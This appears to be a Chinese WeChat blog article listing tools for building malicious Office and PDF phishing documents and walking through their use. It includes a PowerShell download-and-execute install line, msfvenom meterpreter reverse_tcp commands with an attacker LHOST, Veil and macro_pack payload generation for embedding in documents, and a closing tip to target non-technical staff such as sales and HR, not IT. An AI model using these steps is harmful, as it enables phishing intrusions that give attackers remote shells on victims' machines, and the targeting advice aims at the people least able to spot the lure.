在突破目标网络时,经常会用到网络钓鱼技术,而制作恶意文档,诱骗用户点击,就能获得用户设备的访问权限,这是获取目标内网权限最为直接的方式,本文介绍几个制作恶意文档的工具。
Luckystrike
该工具主要使用 COM 对象来执行嵌入 Office 文档的恶意 Payload。
项目地址:
https://github.com/curi0usJack/luckystrike
使用方法:
1、使用管理员权限,执行下面的命令进行初始化安装:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')
2、前往 luckystrike 的文件夹,执行脚本 luckystrike.ps1 进入主菜单:
3、根据菜单提示,创建一个名为 test 的 PowerShell 脚本:
4、查看我们生成的 payload
接下来就可以创建一个嵌入该 Payload 的恶意文件了。
Office-DDE-Payloads
这个工具利用 Office 的 DDE(Dynamic Data Exchange)来执行 Payload。
下载地址:
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
安装好之后,执行 ddeexcel.py 生成 excel 文档,执行 ddeword.py 生成 word 文档:
在目标机器上打开该文档时,弹出下面的提示:
但是并没有看到有计算器弹出,但是查看后台进程发现计算机的进程已经有了。这个工具比较容易设置和使用,但是没有达到想要的效果。
wePWNise
这个工具会生成一个 VBA 代码,嵌入 Office 文档或者模版文件中。
下载地址:
https://github.com/mwrlabs/wePWNise
比如使用 Metasploit 的 Paylaod,首先使用 msfvenom 生成一个可以使用的 payload:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=
-f raw -o /payloads/msf86.raw
or
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=
-f raw -a x86_64 -o /payloads/msf64.raw
然后使用 wePWNise 生成 payload 输出到 文件中:
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt
MacroShop
下载地址:
https://github.com/khr0x40sh/MacroShop
使用 Veil 创建一个 Payload,安装方式:
apt -y install veil/usr/share/veil/config/setup.sh --force --silentorgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh --force --silent
安装好之后,使用下面的命令生成 Payload:
python veil.pyuse 1use <payload of your choice>Fill in the options to meet your needs.generate
生成的 Payload 存储在:
/var/lib/veil/output/source
使用命令:
./macro_safe.py /var/lib/veil/output/source/test.bat test
最终输出的脚本内容如下:
macro_pack
下载地址:
https://github.com/sevagas/macro_pack
安装好之后,使用命令:
python3 test/mp_test.py
使用下面的命令生成文文档:
python3 macro_pack.py -t METERPRETER -G test.xls -p
Worse-PDF
生成恶意的 PDF 文档,下载地址:
https://github.com/3gstudent/Worse-PDF
使用方法:
python WorsePDF.py <normal PDF> <serverIP>
总结
Office 恶意文档是目前最常见的钓鱼手段,也最容易被人警觉,通过邮件发送恶意文档,很多时候会被翻钓鱼邮件网关识别并拦截,如果不存在 Office 软件漏洞的情况,成功率取决于用户的安全意识,所以针对目标用户的选择非常重要,尽量不要选择企业内部的 IT 人员,选择哪些对电脑不熟悉的业务人员,比如销售、HR、行政等人员。
本文始发于微信公众号(信安之路):制作恶意钓鱼文档的多种工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论